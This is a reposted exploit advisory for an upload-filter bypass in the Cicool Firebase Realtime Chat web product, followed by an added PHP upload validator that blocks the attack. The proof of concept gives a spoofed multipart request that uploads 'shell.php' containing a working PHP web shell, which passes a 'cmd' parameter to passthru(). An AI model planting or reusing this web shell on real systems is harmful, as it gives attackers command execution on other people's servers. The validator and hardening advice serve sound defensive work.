Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100136

Below is a copy:

Cicool - Firebase Realtime Chat upload shell bypass
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : Cicool - Firebase Realtime Chat upload shell bypass

[+] Author :
[+] Team: VHB Group
[+] Tested on : Windows 10/Linux
[+] Home Page: https://codecanyon.net/item/cicool-firebase-realtime-chat/24842321
[+]
[+] Demo : https://cicool.go-moment.com/version/v3//uploads/chat/20191021151333-2019-10-21chat151329.html

POC
Modify the requests with Burp Suite. You can go to the chat page and edit the information:

Content-Disposition: form-data; name="qqfile"; filename="shell.php"
Content-Type: image/jpeg


<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>

-----------------------------307831217212391--
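
A server-side check that rejects the request shown above, as an added example (not code from the advisory or from Cicool). The function name `safe_upload_name` and the allowlist are assumptions, and the code needs PHP's fileinfo extension; the sample files are constructed.

```php
<?php
// Added example: hypothetical upload check, not Cicool's own code.
// Maps the MIME type detected from the file content to the only
// extension the server will ever give the stored file.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Returns a server-generated file name for an accepted upload, or null.
 * $clientName is attacker-controlled, and so is the part's Content-Type
 * header, which is deliberately never consulted here.
 */
function safe_upload_name(string $tmpPath, string $clientName): ?string
{
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected === false || !array_key_exists($detected, ALLOWED_TYPES)) {
        return null;                 // content is not an allowed image type
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === 'jpeg') {
        $ext = 'jpg';
    }
    if ($ext !== ALLOWED_TYPES[$detected]) {
        return null;                 // extension disagrees with the content
    }
    // Never reuse the client's name: random base, allowlisted extension.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$detected];
}

// Constructed sample inputs (not taken from the advisory).
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");
$script = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($script, "<?php echo 'constructed test'; ?>");

$cases = [[$gif, 'photo.gif'], [$script, 'shell.php'], [$gif, 'photo.php']];
foreach ($cases as [$path, $name]) {
    $stored = safe_upload_name($path, $name);
    echo $name, ' => ', $stored ?? 'rejected', PHP_EOL;
}
unlink($gif);
unlink($script);
```

In a real handler the inputs would be `$_FILES['qqfile']['tmp_name']` and `$_FILES['qqfile']['name']`, with the file moved by `move_uploaded_file()` under the returned name. The upload directory should also be served with script execution disabled, so a file that slips through is never run.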

